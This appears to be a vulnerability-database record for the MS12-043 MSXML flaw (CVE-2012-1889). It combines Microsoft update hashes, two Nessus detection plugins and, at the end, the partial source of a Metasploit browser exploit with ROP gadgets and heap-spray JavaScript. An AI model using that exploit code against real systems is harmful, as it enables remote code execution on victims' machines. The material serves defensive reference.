class=\"sbody-td\">EBD02DCC5DD60CCC094E92939739B235EB1E05D3</td><td class=\"sbody-td\">1F7A6700A6C2E52B916FDF1634A8314479BD8A89C7E663823397F4F43194DB88</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-NOR.exe</td><td class=\"sbody-td\">BA43BD0A1FC3C1C3031F4A0E4201D37D5FF06255</td><td class=\"sbody-td\">190C1C39493F68D9E60213A65712EA60C7686414468660280B23645C3569817D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-PLK.exe</td><td class=\"sbody-td\">E3C1748D5F89417180F47FAB4AC828E10810E329</td><td class=\"sbody-td\">BEF02F5CCD3A37E10D5818D6EB83D76AA654EF0D3F0F30E9301614288F888DF3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-PTB.exe</td><td class=\"sbody-td\">139273177687051E59F373639697D83238AF58CB</td><td class=\"sbody-td\">3366BE95C8CDF376F738FEAE86481BBA1C6C888B6D3260708123FD1D0986FD78</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-PTG.exe</td><td class=\"sbody-td\">D79E047911EE0BC21B9FBCFF06B3C36B94D04D22</td><td class=\"sbody-td\">80859057A2BEBE5660CE99694F4C3273FD6CAA89CCAA5A281A24969DD1082F95</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-RUS.exe</td><td class=\"sbody-td\">46BEF054D0D20C45B4B87F50E7071E6083B52B12</td><td class=\"sbody-td\">A030A485DFBC681210B9C7384BE12179549A929C0D7E2A76C070A8899A497D8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-SVE.exe</td><td class=\"sbody-td\">F531110A597EF9F6D697ACAD2E27B4B21CA0766D</td><td class=\"sbody-td\">3E6ED8688B90DD84D13631F52AEFB29EB6A2CBC868206D84CE750277AB753C55</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-TRK.exe</td><td class=\"sbody-td\">BF824FDC889B1C8C1DCBDF1465180173BDEC655F</td><td class=\"sbody-td\">2B2EF4332CD02D78E990FBEFAA2E488FCFC626A03558B2AAEFFC14442CFD9CF4</td></tr></table></div></div><h2></h2><div class=\"kb-notice-section section\"><a class=\"bookmark\" id=\"appliestoproducts\"></a><br/><h3 class=\"sbody-h3\">Applies to</h3>This article applies to the following:<br/><ul class=\"sbody-free_list\"><li>Microsoft XML Core Services 6.0 Service Pack 2 when used with:<br/><ul class=\"sbody-free_list\"><li>Windows 7</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows XP Service Pack 3</li><li>Windows XP Professional x64 Edition Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li><li>Microsoft XML Core Services 5.0 when used with:<ul class=\"sbody-free_list\"><li>Microsoft Office SharePoint Server 2007 Service Pack 2</li><li>Microsoft Office SharePoint Server 2007 Service Pack 3</li><li>Microsoft Groove Server 2007 Service Pack 2</li><li>Microsoft Groove Server 2007 Service Pack 3</li><li>2007 Microsoft Office Suite Service Pack 2</li><li>2007 Microsoft Office Suite Service Pack 3</li><li>Microsoft Office Word Viewer</li><li>Microsoft Office Compatibility Pack Service Pack 2</li><li>Microsoft Office Compatibility Pack Service Pack 3</li><li>Microsoft Expression Web Service Pack 1</li><li>Microsoft Expression Web 2</li><li>Microsoft Office 2003 Service Pack 3</li></ul></li><li>Microsoft XML Core Services 4.0 Service Pack 3 when used with:<br/><ul class=\"sbody-free_list\"><li>Windows 8</li><li>Windows Server 2012</li><li>Windows 7</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows XP Service Pack 3</li><li>Windows XP Professional x64 Edition Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li><li>Microsoft XML Core Services 3.0 when used with:<br/><ul class=\"sbody-free_list\"><li>Windows 7</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows XP Service Pack 3</li><li>Windows XP Professional x64 Edition Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li></ul></div></body></html>", "edition": 2, "modified": "2012-12-11T18:44:28", "id": "KB2722479", "href": "https://support.microsoft.com/en-us/help/2722479/", "published": "2012-08-14T00:00:00", "title": "MS12-043: Vulnerability in Microsoft XML Core Services could allow remote code execution: August 14, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:35", "description": "The version of Microsoft XML Core Services installed on the remote\nWindows host is affected by a remote code execution vulnerability\nthat could allow arbitrary code execution if a user views a specially\ncrafted web page using Internet Explorer.", "edition": 26, "published": "2012-07-11T00:00:00", "title": "MS12-043: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:xml_core_services"], "id": "SMB_NT_MS12-043.NASL", "href": "https://www.tenable.com/plugins/nessus/59906", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59906);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-1889\");\n script_bugtraq_id(53934);\n script_xref(name:\"MSFT\", value:\"MS12-043\");\n script_xref(name:\"MSKB\", value:\"2719985\");\n script_xref(name:\"MSKB\", value:\"2721691\");\n script_xref(name:\"MSKB\", value:\"2721693\");\n script_xref(name:\"MSKB\", value:\"2687324\");\n script_xref(name:\"MSKB\", value:\"2596856\");\n script_xref(name:\"MSKB\", value:\"2596679\");\n script_xref(name:\"MSKB\", value:\"2687497\");\n script_xref(name:\"MSKB\", value:\"2687627\");\n\n script_name(english:\"MS12-043: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479)\");\n script_summary(english:\"Checks the versions of Msxml3.dll, Msxml4.dll, and Msxml6.dll\");\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nXML Core Services.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft XML Core Services installed on the remote\nWindows host is affected by a remote code execution vulnerability\nthat could allow arbitrary code execution if a user views a specially\ncrafted web page using Internet Explorer.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2012/2719615\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:xml_core_services\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS12-043';\nkbs = make_list(\"2719985\", \"2721691\", \"2721693\", \"2687324\", \"2596856\", \"2596679\", \"2687497\", \"2687627\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1', win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (!is_accessible_share()) audit(AUDIT_SHARE_FAIL, 'is_accessible_share');\n\ncommonfiles = hotfix_get_commonfilesdir();\nif (commonfiles)\n msxml5_dir = commonfiles + '\\\\Microsoft Shared\\\\Office11';\n\nvuln = 0;\n\n# Windows 8 / Server 2012\nvuln += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\n\n# Windows 7 / Server 2008 R2\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml3.dll\", version:\"8.110.7600.17036\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml3.dll\", version:\"8.110.7600.21227\", min_version:\"8.110.7600.21000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml3.dll\", version:\"8.110.7601.17857\", min_version:\"8.110.7601.17000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml3.dll\", version:\"8.110.7601.22012\", min_version:\"8.110.7601.22000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml6.dll\", version:\"6.30.7600.17036\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msxml6.dll\", version:\"6.30.7600.21227\", min_version:\"6.30.7600.21000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml6.dll\", version:\"6.30.7601.17857\", min_version:\"6.30.7601.17000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Msxml6.dll\", version:\"6.30.7601.22012\", min_version:\"6.30.7601.22000\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\n\n# Vista / Windows Server 2008\nvuln += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msxml3.dll\", version:\"8.100.5005.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msxml6.dll\", version:\"6.20.5005.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\n\n# Windows 2003 and XP x64\nvuln += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msxml3.dll\", version:\"8.100.1052.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msxml6.dll\", version:\"6.20.2012.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721693\");\n\n# Windows XP\nvuln += hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Msxml3.dll\", version:\"8.100.1053.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\nvuln += hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Msxml4.dll\", version:\"4.30.2114.0\", min_version:\"4.30.0.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2721691\");\nvuln += hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Msxml6.dll\", version:\"6.20.2501.0\", dir:\"\\System32\", bulletin:bulletin, kb:\"2719985\");\n\n# XML Core Services 5 (this could be one of three KBs - KB2687324, KB2596856, KB2596679)\n# Update: KBs KB2687324 and KB2596679 are replaced by KB2687627 and KB2687497 respectively.\nif (msxml5_dir)\n vuln += hotfix_is_vulnerable(path:msxml5_dir, file:\"Msxml5.dll\", version:\"5.20.1096.0\", min_version:\"5.0.0.0\", bulletin:bulletin);\n\nif (vuln > 0)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-29T13:43:30", "edition": 3, "description": "The remote host is missing the workaround referenced in KB 2719615.\n\nAn issue exists in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 when the application attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.", "published": "2012-06-13T00:00:00", "type": "nessus", "title": "MS KB2719615: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "cpe": ["cpe:/o:microsoft:windows"], "modified": "2017-08-30T00:00:00", "id": "SMB_KB2719615.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=59461", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59461);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:46 $\");\n\n script_cve_id(\"CVE-2012-1889\");\n script_bugtraq_id(53934);\n script_osvdb_id(82873);\n script_xref(name:\"EDB-ID\", value:\"19186\");\n script_xref(name:\"MSKB\", value:\"2719615\");\n\n script_name(english:\"MS KB2719615: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution\");\n script_summary(english:\"Checks for workaround\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through a web \nbrowser.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the workaround referenced in KB 2719615.\n\nAn issue exists in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 \nwhen the application attempts to access an object in memory that has \nnot been initialized, which may corrupt memory in such a way that an \nattacker could execute arbitrary code in the context of the logged-on\nuser.\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the Microsoft suggested workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2719615\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.microsoft.com/kb/2719615\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'windows/browser/msxml_get_definition_code_exec.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2012-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_ports(139, 445);\n script_require_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\n# This script has been disabled and is intended to be blank.\n# Disabled on 2012/07/10. Deprecated by smb_nt_ms12-043.nasl.\nexit(0, \"Deprecated - replaced by smb_nt_ms12-043.nasl\");\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:2) <= 0) exit(0, 'The host is not affected based on its version / service pack.');\nif ('Windows Embedded' >< get_kb_item_or_exit('SMB/ProductName'))\n audit(AUDIT_INST_VER_NOT_VULN, 'Windows Thin OS');\n\nvuln = 0;\n\nregistry_init();\nhandle = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nitems = make_list(\n \"{f300e352-12de-4e7f-ace3-a376874402b6}\",\n \"{29447369-6968-4e86-a208-603f6f0771a6}\",\n \"{06b2b7ed-809a-44e6-8538-ca0f5b74ecc4}\"\n);\n\nsystemroot = hotfix_get_systemroot();\npaths = make_list();\nforeach item (items)\n{\n path = get_registry_value(handle:handle, item:'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\'+item+'\\\\DatabasePath');\n if (!isnull(path))\n paths = make_list(paths, path);\n else paths = make_list(paths, systemroot+'\\\\AppPatch\\\\Custom\\\\'+item+'.sdb');\n}\nRegCloseKey(handle:handle);\nclose_registry(close:FALSE);\n\n# Now make sure the files are in place\nforeach path (paths)\n{\n share = ereg_replace(pattern:'^([A-Za-z]):.*', replace:\"\\1$\", string:path);\n sdb = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\", string:path);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n close_registry(close:FALSE);\n debug_print('Failed to connect to the \\''+share+'\\'.');\n continue;\n }\n\n fh = CreateFile(\n file:sdb,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (isnull(fh))\n vuln++;\n else\n CloseFile(handle:fh);\n close_registry(close:FALSE);\n}\nNetUseDel();\n\nif (vuln)\n{\n security_hole(port:port);\n exit(0);\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-13T00:08:04", "description": "This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution.\n", "published": "2012-06-16T00:26:33", "type": "metasploit", "title": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MSXML_GET_DEFINITION_CODE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"6.0\",\n :ua_maxver => \"9.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :classid => \"{f6D90f11-9c73-11d3-b32e-00C04f990bb4}\",\n :method => \"definition\",\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption\",\n 'Description' => %q{\n This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'inking26', # Reliable exploitation\n 'binjo', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-1889' ],\n [ 'BID', '53934' ],\n [ 'OSVDB', '82873'],\n [ 'MSB', 'MS12-043'],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],\n [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],\n [ 'URL', 'https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # msxml3.dll 8.90.1101.0\n [ 'Automatic', {} ],\n [\n 'IE 6 on Windows XP SP3',\n {\n 'Offset' => '0x100',\n 'Rop' => nil,\n 'RandomHeap' => false\n }\n ],\n [\n 'IE 7 on Windows XP SP3 / Vista SP2',\n {\n 'Offset' => '0x100',\n 'Rop' => nil,\n 'RandomHeap' => false\n }\n ],\n [\n 'IE 8 on Windows XP SP3',\n {\n 'Rop' => :msvcrt,\n 'RandomHeap' => false,\n 'RopChainOffset' => '0x5f4',\n 'Offset' => '0x0',\n 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll\n }\n ],\n [\n 'IE 8 with Java 6 on Windows XP SP3',\n {\n 'Rop' => :jre,\n 'RandomHeap' => false,\n 'RopChainOffset' => '0x5f4',\n 'Offset' => '0x0',\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ],\n [\n 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',\n {\n 'Rop' => :jre,\n 'RandomHeap' => false,\n 'RopChainOffset' => '0x5f4',\n 'Offset' => '0x0',\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ],\n [\n 'IE 9 with Java 6 on Windows 7 SP1',\n {\n 'Rop' => :jre,\n 'RandomHeap' => true,\n 'RopChainOffset' => 0x5FC,\n 'Offset' => '0x0',\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-06-12',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\n return targets[1] #IE 6 on Windows XP SP3\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\n return targets[2] #IE 7 on Windows XP SP3\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7/\n return targets[2] #IE 7 on Windows Vista SP2\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\n return targets[3] #IE 8 on Windows XP SP3\n elsif agent =~ /NT 6\\.[01]/ and agent =~ /MSIE 8/\n return targets[5] #IE 8 on Windows 7 SP1/Vista SP2\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 9/\n return targets[6] #IE 9 on Windows 7 SP1\n else\n return nil\n end\n end\n\n def ret(t)\n case t['Rop']\n when :msvcrt\n return [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\n when :jre\n return [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll\n end\n end\n\n def popret(t)\n case t['Rop']\n when :msvcrt\n return [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\n when :jre\n return [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll\n end\n end\n\n def get_rop_chain(t)\n if t['RandomHeap']\n adjust = [ 0x0c0c0c0c ].pack(\"V\") # heap isn't filled with pointers to 0x0c0c0c0c\n adjust << ret(t)\n else\n adjust = ret(t)\n end\n\n adjust << popret(t)\n adjust << [ t['StackPivot'] ].pack(\"V\")\n adjust << ret(t) * 4 # first call to a \"ret\" because there is a good gadget in the stack :)\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})\n\n else\n print_status(\"Using JRE ROP\")\n rop = generate_rop_payload('java','',{'pivot'=>adjust})\n end\n\n return rop\n end\n\n def get_easy_spray(t, js_code, js_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n\n while (nops.length < 0x80000) nops += nops;\n\n var offset = nops.substring(0, #{t['Offset']});\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n\n heap_obj.gc();\n for (var z=1; z < 0x230; z++) {\n heap_obj.alloc(block);\n }\n\n JS\n\n return spray\n\n end\n\n\n def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n randnop2 = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n var #{randnop2} = \"#{js_90_nops}\";\n var nops_90 = unescape(#{randnop2});\n var rop_chain = unescape(\"#{js_rop}\");\n\n while (nops.length < 0x80000) nops += nops;\n while (nops_90.length < 0x80000) nops_90 += nops_90;\n\n var offset = nops.substring(0, #{t['Offset']});\n var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);\n var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);\n\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n\n heap_obj.gc();\n for (var z=1; z < 0x230; z++) {\n heap_obj.alloc(block);\n }\n\n JS\n\n return spray\n\n end\n\n # Spray published by corelanc0d3r\n # Exploit writing tutorial part 11 : Heap Spraying Demystified\n # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\n def get_random_spray(t, js_rop, js_code, js_90_nops)\n\n spray = <<-JS\n\n function randomblock(blocksize)\n {\n var theblock = \"\";\n for (var i = 0; i < blocksize; i++)\n {\n theblock += Math.floor(Math.random()*90)+10;\n }\n return theblock;\n }\n\n function tounescape(block)\n {\n var blocklen = block.length;\n var unescapestr = \"\";\n for (var i = 0; i < blocklen-1; i=i+4)\n {\n unescapestr += \"%u\" + block.substring(i,i+4);\n }\n return unescapestr;\n }\n\n var heap_obj = new heapLib.ie(0x10000);\n\n var rop = unescape(\"#{js_rop}\");\n var code = 